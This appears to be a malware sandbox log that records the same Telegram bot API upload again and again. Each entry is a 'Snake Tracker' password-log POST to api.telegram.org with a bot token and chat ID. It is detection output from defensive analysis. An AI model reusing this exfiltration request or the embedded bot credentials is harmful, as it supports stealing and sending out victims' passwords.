          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf17a3acb6994Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf1d37b977030Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf2245aff2ed4Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf26c929e065dHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf2b3164b9386Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf4c10f13b819Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf51324ab0cc4Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf570fe652fbfHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf5c1e974e0c1Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf7ea90d9cc3dHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf8990a312940Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf9086c9c212bHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf95a72979d06Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf9ac59ba2b7bHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf9ff7eb9cfd7Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfa4a489d1784Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfa9be8e3d3a4Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfaebff733d3cHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfb3d74a07ef1Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfb71bb175392Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfbbbebbd6c73Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfc0bb3f6adf3Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfc5dd9d17be4Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd011f8a276c68Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd015482333e8dHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd01a2be2e504bHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd01f3f5b901aaHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd026a531c5b05Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd02be3a529e52Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd03130094d087Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd038bba82bd16Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd03cc8c45aec3Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0426a2e8f167Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0477f2d17d84Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd04cd8c845f88Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd05245e6271d3Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0567912c48b5Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd06087186fd40Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd066f4ea4de0bHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd06ce01d0608bHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd08fbf92642aeHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0a4f7852c7fdHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ad8215b06bbHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b4a4b3f4a98Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0bb3f9b747b0Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0c074be0e0b4Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0cb1bc016dadHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0d0d033d72a3Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0d5d287e471cHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dae88b38925Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dfe7e0ed492Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ffe117a5e37Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10546c775586Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10bcc08ff78fHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd11117b97e492Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1165e66f96a5Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd11bbbd263db8Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd120b60779b87Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd125ccd940545Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd12ab3d99a9feHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd12ede91e4116Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd13514572cb14Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd13ad63271467Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd14025a1c1cdcHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd144bd6ecd266Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd149eedb82b6cHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd15016b1ea21cHost: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd16f86a2bc2cdHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1749e1d9f2d8Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd179fe028ee6bHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd17df79de90e0Host: api.telegram.orgContent-Length: 547
          Source: global trafficHTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd184510fb928cHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
